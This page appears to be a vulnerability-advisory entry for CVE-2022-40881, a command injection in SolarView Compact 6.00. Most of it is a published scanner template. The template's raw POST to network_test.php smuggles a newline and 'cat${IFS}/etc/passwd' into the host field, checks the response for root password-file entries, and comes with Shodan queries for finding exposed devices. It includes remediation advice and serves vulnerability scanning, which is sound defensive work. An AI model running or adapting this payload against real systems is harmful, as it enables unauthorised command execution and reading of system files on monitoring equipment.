CVE-2022-40881: SolarView 6.00 - Remote Command Execution

日期: 2025-08-01 | 影响软件: SolarView | POC: 已公开

漏洞描述

SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.

PoC代码[已公开]

id: CVE-2022-40881

info:
  name: SolarView 6.00 - Remote Command Execution
  author: For3stCo1d
  severity: critical
  description: |
    SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of SolarView.
  reference:
    - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
    - https://github.com/advisories/GHSA-wx3r-88rg-whxq
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40881
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40881
    cwe-id: CWE-77
    epss-score: 0.93672
    epss-percentile: 0.99831
    cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: solarview_compact
    shodan-query:
      - http.favicon.hash:"-244067125"
      - cpe:"cpe:2.3:h:contec:solarview_compact"
  tags: cve,cve2022,solarview,rce,lfi,contec,vkev,vuln
variables:
  cmd: "cat${IFS}/etc/passwd"

http:
  - raw:
      - |
        POST /network_test.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        host=%0a{{cmd}}%0a&command=ping

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022100e690a16718dfc07682dfe52711476253ba7a78e3b7a4772e403af34afdfcb3d0021f45050eabd2262346c26093f240034d4a1761bbf19b5ef52e0a36db0eccf808:922c64590222798bb761d5b6d8e72950

相关漏洞推荐